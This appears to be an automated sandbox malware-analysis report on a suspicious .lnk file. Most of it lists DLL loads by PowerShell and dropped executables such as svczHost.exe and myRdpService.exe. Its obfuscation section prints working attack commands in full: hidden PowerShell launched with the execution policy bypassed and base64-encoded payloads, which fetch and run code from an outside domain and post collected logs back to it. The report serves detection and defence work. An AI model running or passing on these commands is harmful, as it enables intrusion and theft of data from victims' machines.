      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: apphelp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: icu.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winhttp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: mswsock.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: wshunix.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winrnr.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: nlaapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: napinsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: wshbth.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: devobj.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winnsi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: sspicli.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: schannel.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: msasn1.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: apphelp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ncrypt.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: version.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntasn1.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: icu.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: winhttp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: mswsock.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshunix.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dnsapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: winrnr.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: nlaapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: napinsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshbth.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: devobj.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
      Source: eQwUFcwrXk.lnkStatic file information: File size 17825792 > 1048576
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbPLP source: powershell.exe, 00000006.00000002.6986665328.00000221F3F38000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bb.pdb?|yJ! source: powershell.exe, 00000006.00000002.6986665328.00000221F3F00000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: on.pdba source: powershell.exe, 00000006.00000002.6985258380.00000221F3DDF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.6985258380.00000221F3D4E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.6986665328.00000221F3F38000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb_05 source: powershell.exe, 00000006.00000002.6986665328.00000221F3F38000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: l\System.pdbp# source: powershell.exe, 0000000A.00000002.7753000643.000001ECB3D22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: !n.pdbPv source: powershell.exe, 00000006.00000002.6957927750.000000B7C9B76000.00000004.00000010.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("VjBWUlFTQWlSWEp5YjNJZ0pGOHVSWGhqWlhCMGFXOXVMazFsYzNOaFoyVWlPenNOQ2lBZ0lDQWdJQ0FnZlEwS0lDQWdJSDBOQ2lBZ0lDQU5DbjBOQ2cwS1puVnVZM1JwYjI0Z1ZWWlFRbEZQVjBWUlFTQjdEUW9nSUNBZ2NHRnlZVzBvSUZ0UV
      Obfuscated command line found
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit
      PowerShell case anomaly found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" Jump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAI